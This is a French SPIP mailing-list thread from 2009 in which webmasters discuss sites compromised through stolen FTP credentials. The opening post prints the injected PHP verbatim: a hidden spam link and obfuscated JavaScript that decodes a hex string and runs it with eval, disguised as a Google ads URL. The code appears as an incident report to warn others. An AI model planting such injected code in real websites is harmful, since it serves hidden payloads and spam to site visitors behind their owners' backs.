Bonjour,
je ne sais pas si l'info peut servir ici mais je la livre quand même.
j'ai une dizaine de sites spip chez Haisoft qui ont tous été piratés par injection de code dans les fichiers index.php et spip.php
Le code en question est le suivant :
<?php @register_shutdown_function("__sfd1249290276__");function __sfd1249290276__() { global $__sdv1249290276__; if (!empty($__sdv1249290276__)) return; $__sdv1249290276__=1; echo <<<DOC__DOC
<!-- [75aac34ae096d0f7a0a760f906d45a20 --><!-- 6720929421 --><div id=« goro »><ul><li><a href=« http://rh3t3gh3h23g4.cc/sl »>.</a></li></ul></div><script type=« text/javascript »><!--
function getme(str){ var idx = str.indexOf(’?’); if (idx == -1) return str; var len = str.length; var new_str = ‹ ›; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }
getme(‹ http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306 ›); //-->
</script><!-- 75aac34ae096d0f7a0a760f906d45a20] -->
DOC__DOC;
} ?>
<?php
# appel SPIP
include (‹ spip.php ›);
?>
<?php error_reporting(0); echo "\n"; @__sfd1249290276__(); ?>
Cela produit l'injection de centaines de lignes de spam dans mes pages et génère des erreurs dans mes javascripts.
SI cela vous arrive, l'intrusion se fait par ftp. Il y a donc urgence à néttoyer et à changer vos codes d'accès ftp.
Si l'info peut servir à d'autres...
Pierrick
Pierrick Le Feuvre a écrit :
Bonjour,
...
Cela produit l'injection de centaines de lignes de spam dans mes pages et génère des erreurs dans mes javascripts.
SI cela vous arrive, l'intrusion se fait par ftp. Il y a donc urgence à néttoyer et à changer vos codes d'accès ftp.
Cela s'est produit avec d'autres spammeurs (au code plus élégant que celui-ci 
), sur spip et autres CMS.
Le problème venait d'une machine windows sur laquelle était stocké les mots de passe FTP.
Cordialement.
Jean-Paul Chiron a écrit :
Pierrick Le Feuvre a écrit :
Bonjour,
...
Cela produit l'injection de centaines de lignes de spam dans mes pages et génère des erreurs dans mes javascripts.
SI cela vous arrive, l'intrusion se fait par ftp. Il y a donc urgence à néttoyer et à changer vos codes d'accès ftp.
Cela s'est produit avec d'autres spammeurs (au code plus élégant que celui-ci ), sur spip et autres CMS.
Le problème venait d'une machine windows sur laquelle était stocké les mots de passe FTP.
Cordialement.
On peut en savoir un peu plus ?
C'est arrivé ce week-end sur un site dont je m'occupe, qui a été blacklisté par Google, et j'aimerais bien savoir qui possède (et comment...) ces mots de passe !?
A vous lire...
Kris, il veut simplement dire qu'il faut nettoyer sa machine
Changer ses codes d'accès FTP ne sert à rien, si la machine qu'on utilise
pour se connecter au FTP est vérolée, le problème se posera toujours 
J'avais eu le souci il y a quelques temps, un bon coup de vidange sur le PC
et c'était réglé
-----Message d'origine-----
De : kris [mailto:wkris@club-internet.fr]
Envoyé : jeudi 6 août 2009 12:27
À : Jean-Paul Chiron
Cc : spip@rezo.net
Objet : Re: [Spip] info piratage
Jean-Paul Chiron a écrit :
Pierrick Le Feuvre a écrit :
Bonjour,
...
Cela produit l'injection de centaines de lignes de spam dans mes pages
et génère des erreurs dans mes javascripts.
SI cela vous arrive, l'intrusion se fait par ftp. Il y a donc urgence
à néttoyer et à changer vos codes d'accès ftp.
Cela s'est produit avec d'autres spammeurs (au code plus élégant que
celui-ci ), sur spip et autres CMS.
Le problème venait d'une machine windows sur laquelle était stocké les
mots de passe FTP.
Cordialement.
On peut en savoir un peu plus ?
C'est arrivé ce week-end sur un site dont je m'occupe, qui a été
blacklisté par Google, et j'aimerais bien savoir qui possède (et
comment...) ces mots de passe !?
A vous lire...
_______________________________________________
liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net
Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
Discuter chez rezo.net
Documentation de SPIP : http://www.spip.net/
Irc : de l'aide à toute heure : http://spip.net/irc
Une stratégie intéressante consiste à ne pas enregistrer son mot de passe
dans son client FTP, mais vu les mots de passe de certains, ca peut devenir
vite énervant
-----Message d'origine-----
De : kris [mailto:wkris@club-internet.fr]
Envoyé : jeudi 6 août 2009 12:36
À : Samy Rabih
Cc : 'Jean-Paul Chiron'; spip@rezo.net
Objet : Re: info piratage
OK, c'est plus clair
Samy Rabih a écrit :
Kris, il veut simplement dire qu'il faut nettoyer sa machine
Changer ses codes d'accès FTP ne sert à rien, si la machine qu'on utilise
pour se connecter au FTP est vérolée, le problème se posera toujours
J'avais eu le souci il y a quelques temps, un bon coup de vidange sur le
PC
et c'était réglé
-----Message d'origine-----
De : kris [mailto:wkris@club-internet.fr]
Envoyé : jeudi 6 août 2009 12:27
À : Jean-Paul Chiron
Cc : spip@rezo.net
Objet : Re: [Spip] info piratage
Jean-Paul Chiron a écrit :
Pierrick Le Feuvre a écrit :
Bonjour,
...
Cela produit l'injection de centaines de lignes de spam dans mes pages
et génère des erreurs dans mes javascripts.
SI cela vous arrive, l'intrusion se fait par ftp. Il y a donc urgence
à néttoyer et à changer vos codes d'accès ftp.
Cela s'est produit avec d'autres spammeurs (au code plus élégant que
celui-ci ), sur spip et autres CMS.
Le problème venait d'une machine windows sur laquelle était stocké les
mots de passe FTP.
Cordialement.
On peut en savoir un peu plus ?
C'est arrivé ce week-end sur un site dont je m'occupe, qui a été
blacklisté par Google, et j'aimerais bien savoir qui possède (et
comment...) ces mots de passe !?
A vous lire...
_______________________________________________
liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net
Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
Discuter chez rezo.net
Documentation de SPIP : http://www.spip.net/
Irc : de l'aide à toute heure : http://spip.net/irc
Samy Rabih a écrit :
Une stratégie intéressante consiste à ne pas enregistrer son mot de passe
dans son client FTP, mais vu les mots de passe de certains, ca peut devenir
vite énervant
Pas forcément efficace, car si ta machine est vérolée, rien ne te dis que le client FTP n'est pas vérolé et qu'il envoie les mots de passe à un site pirate.
<troll> Il y a un bon antivirus qui s'appelle linux </troll>
<anti-troll>ca existe sous tous les OS, ce problème</anti-troll>
En gros, tenez propres vos machines
-----Message d'origine-----
De : Jean-Paul Chiron [mailto:chiron@tic.aquitaine.fr]
Envoyé : jeudi 6 août 2009 13:23
À : spip@rezo.net
Objet : Re: [Spip] info piratage
Samy Rabih a écrit :
Une stratégie intéressante consiste à ne pas enregistrer son mot de passe
dans son client FTP, mais vu les mots de passe de certains, ca peut
devenir
vite énervant
Pas forcément efficace, car si ta machine est vérolée, rien ne te dis
que le client FTP n'est pas vérolé et qu'il envoie les mots de passe à
un site pirate.
<troll> Il y a un bon antivirus qui s'appelle linux </troll>
_______________________________________________
liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net
Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
Discuter chez rezo.net
Documentation de SPIP : http://www.spip.net/
Irc : de l'aide à toute heure : http://spip.net/irc
kris <wkris <at> club-internet.fr> writes:
Jean-Paul Chiron a écrit :
> Pierrick Le Feuvre a écrit :
...
On peut en savoir un peu plus ?
Tout est là
après ce sont des variantes sur le même principe.
Cédric